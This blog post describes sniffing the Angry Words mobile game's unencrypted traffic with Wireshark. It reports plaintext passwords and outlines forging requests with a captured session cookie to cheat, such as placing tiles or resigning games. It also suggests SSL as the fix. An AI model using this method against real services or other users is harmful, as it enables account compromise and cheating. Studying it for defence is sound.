How to (honourlessly) win in Angry Words

In my scarce free time I use to play Angry Words. For those who never heard about it (quite unlikely if you’re reading this article) Angry Words is basically a Scrabble that can be played online against different opponents. There are currently versions for Android and iPhone.

 

Recently, in May 2011, there was a security hole reported in WhatsApp which left user accounts open for hijacking. Since May 2011 it has been reported that communications made by WhatsApp are not encrypted, and data is sent and received in plaintext, meaning messages can easily be read if packet traces are available. Together with the well-known storage of the full set of messages sent and received within the application (that can be easily cracked) lead me to think if that was a concrete disastrous development, or a generalized trend in most mobile applications. Therefore, I decided to see if it could be possible to do the same with Angry Words.

 

If you want to reproduce this article, you will need to set up your environment to sniff data from your mobile. There are many options to achieve this (install a cracked .apk or .ipa into your emulator and capture the data, root your Android device and capture the data with a sniffer…), but for me the easiest one was to use my computer as a bridge for my phone, and use Wireshark to sniff the data.   The process is quite simple: you just need to activate the “Internet Sharing” option, using your AirPort as a bridge to your ethernet connection (if you don’t have an ethernet connection, you will still surely have the option to tether your phone). In “Configuration” – “Internet Sharing” proceed as shown in the following image:

 

 

You probably get the idea: the point is connecting the device to your computer and sniff the traffic from there. Is outside the purpose of this article to teach how to use Wireshark, but you can find many tutorials on Internet. Basically, when your device is connected start up Wireshark on your computer and attach to the Wi-Fi interface. You normally need to start Wireshark as the super-user in order to have enough rights to capture traffic. You can do this by typing sudo wireshark &.

We want to capture packets on the AirPort interface, which very likely will be the interface en1. Click the leftmost button on the Wireshark toolbar, and then click “Start” next to device en1:

When this has been set up, and your device is connected to your computer, you will begin to filter all the packages. Since Wireshark does not discriminate between all the applications, is a good idea to filter the packages that will be captures. For this purpose, you can create a filter using the following expression:

ip.src == xx.xx.xx.xx

ip.dst == xx.xx.xx.xx

The xx.xx.xx.xx value is the private IP that your phone has been assigned when connecting to your computer. In my case, this IP is 10.2.2.2

Now we will only display the packages corresponding to our device, so it’s time to play. By opening Angry Words and playing, we will see each petition sent from the application (and received from the server). We will soon notice some failures:

  • The application uses plain HTML, no SSL in between. We can see all the petitions sent as web petitions. We can log in the application through Facebook Auth, or with our mail and password. If we use the second way, even the password is sent in plain text.
  • All the information about each game is stored in the server (since we can access from different devices), what makes a little bit m0re complicated to hack an already created game. But it can be achieved using a Man in the Middle attack, not hard if we are using our own computer as a proxy (also, we can decide whether a word is right or not).
  • With each connection, a cookie value is created. This cookie valued has to be sent within each petition to validate all the requests.

Let’s see some examples of captured data. In the following, we are requesting information about a particular game:

After sending a petition to check if a word is right, we also received in plain text all the information

Here begins the interesting part: this is how we can send a tile to the server:

We also can see how to resign a game:

 

So, after analyzing all the possible games, we can conclude the following:

In each of those petitions (except to check the validity of a word) we need to insert the value of a cookie. To create custom HTTP Requests, and depending on your Operative System, I would recommend you to use Fiddler for Windows. For Mac I’m not sure whether FireBug allows you to create custom HTTP requests, but I’m using Simple Rest Client for this article, and works pretty well. But there are plenty of tools around there to be used

 

How this can be solved?

 

The obvious thing is to use a SSL connection, but this might require some changes and time in the server configuration. Also, to manipulate the petitions (unless we automate it) there is sometime required, so creating an adjusted timeout is also a good idea. I want to remark that, although the petitions can be sent from a computer or an automatized programs, to manipulate the data sent back is only possible to do through a Wireless Network. So, if you are suspicious that your AngryWords partner might be a hacker, disconnect your WiFi while you’re playing against him or her.

 

You can contact me on my private email, or leave a message as a comment. If the post has been helpful for you, consider being nice and cite me if you’re going to use it.

Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>